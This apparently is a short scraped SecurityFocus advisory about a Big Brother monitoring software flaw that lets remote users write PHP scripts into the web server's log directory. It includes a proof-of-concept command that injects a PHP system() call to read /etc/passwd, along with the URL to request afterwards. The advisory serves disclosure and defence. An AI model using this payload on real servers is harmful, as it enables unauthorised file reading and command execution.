7 lines
No EOL
440 B
Text
7 lines
No EOL
440 B
Text
source: https://www.securityfocus.com/bid/1494/info
|
|
|
|
A vulnerability in Big Brother exists which would allow a user to remotely create CGI scripts which could be requested from the Web Server. These could be used to read files and possibly execute commands on the web server machine.
|
|
|
|
./bb 1.2.3.4 "status evil.php3 <?<system(\"cat /etc/passwd\");?>"
|
|
|
|
will allow viewing of the /etc/passwd upon browsing to http://1.2.3.4/bb/logs/evil.php3. |